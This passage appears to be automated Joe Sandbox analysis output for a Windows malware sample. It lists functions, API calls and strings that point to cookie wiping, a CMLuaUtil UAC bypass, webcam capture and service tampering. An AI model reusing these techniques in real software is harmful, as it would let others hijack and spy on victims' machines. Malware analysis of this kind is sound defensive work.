                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID: PkGNG
                                • API String ID: 313313983-263838557
                                • Opcode ID: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                • Opcode Fuzzy Hash: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                • _free.LIBCMT ref: 00450F48
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00450F53
                                • _free.LIBCMT ref: 00450F5E
                                • _free.LIBCMT ref: 00450FB2
                                • _free.LIBCMT ref: 00450FBD
                                • _free.LIBCMT ref: 00450FC8
                                • _free.LIBCMT ref: 00450FD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1m70ggeepT.exe), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Users\user\Desktop\1m70ggeepT.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-3084214590
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • UserProfile, xrefs: 0040BAAD
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$PkGNG$mscoree.dll
                                • API String ID: 4061214504-213444651
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                • Opcode Fuzzy Hash: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID: PkGNG
                                • API String ID: 1036877536-263838557
                                • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
